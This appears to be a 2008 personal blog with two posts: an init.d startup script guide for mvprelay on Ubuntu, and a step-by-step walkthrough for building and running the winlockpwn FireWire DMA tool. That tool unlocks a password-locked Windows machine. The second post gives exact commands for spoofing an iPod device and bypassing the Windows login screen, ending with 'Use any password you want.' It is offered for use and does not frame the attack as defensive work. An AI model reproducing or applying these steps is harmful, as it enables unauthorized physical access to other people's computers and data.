Saturday, March 22, 2008

Starting mvprelay via init.d

I have created a script to start and stop mvprelay via the init.d process. The script is for Ubuntu 7.10 - the Gutsy Gibbon.
  1. Download mvprelay_init.tar.gz to /tmp
  2. cd /
  3. sudo tar xvfz /tmp/mvprelay_init.tar.gz
  4. vim /etc/default/mvprelay
    1. Update the MEDIA_SERVER variable with your server's IP address
    2. save the file
  5. sudo update-rc.d mvprelay start 50 2 3 4 5 .
  6. /etc/init.d/mvprelay start
This process should extract the files to the correct location under /etc (/etc/init.d and /etc/default). The update-rc.d command sets mvprelay to start in run modes 2, 3, 4 , 5 and priority 50 (which should be after the dhcpd, tftp mysql servers have started).

I have test the script, it starts, it stops, it restarts. mvpmc boots up from a cold boot. Other than that it is completely untested so your results may differ. No warranty provided, but I will help where I can.

Saturday, March 08, 2008

Breaking Windows with Firewire and Ubuntu

Adam Boileau ( recently released source code for a tool that can unlock a password locked Windows machine in seconds. While quite simple to use the documentation is not clear on how exactly it is used or how the parts work. I hope this helps:

These instructions are for Ubuntu 7.10 - the Gutsy Gibbon:

First install the required libraries:
apt-get install libdc1394-13 libraw1394-dev swig
Second download and install Python 2.3:
tar xvfz Python-2.3.6.tgz
mv Python-2.3.6 python-2.3
cd python-2.3
sudo make install
This will install python in /usr/local which means you need to update each script to reference this location.

Third, Fixup the libraw1394:
vim /usr/local/include/libraw1394/raw1394.h
search for and comment out the__attribute__ ((deprecated)); and be sure to put an ending semicolon on the previous line

Fourth, download the software from
tar xvfz pythonraw1394-1.0.tar.gz
cd pythonraw1394
chmod +x ./winlockpwn
vim Makefile (reference /usr/local instead of /usr for python)
Fifth, load the module and set some permissions:
sudo modprobe raw1394
sudo chmod 666 /dev/raw1394
Sixth, plug into the Windows machine

Seventh, load the ipod image to the firewire port
vim romtool (update the location of python to be /usr/local/bin/python)
./romtool -s 0 ipod.csr
Eighth, run businfo to check the port configurations:
vim businfo (update the location of python to be /usr/local/bin/python)
At this point you should see two nodes listed. Node 0 is the ipod image that you loaded with romtool. Node 1 is the Windows machine.

Ninth, run the utility:
vim winlockpwn (update the location of python to be /usr/local/bin/python)
./winlockpwn 0 1 1
You can get more information on the winlockpwn parameters by running the command without parameters. The first parameter is the firewire port, the second is the node (in this case the node for Windows) and the third is the type of Windows password screen.

Tenth, login to Windows

Use any password you want...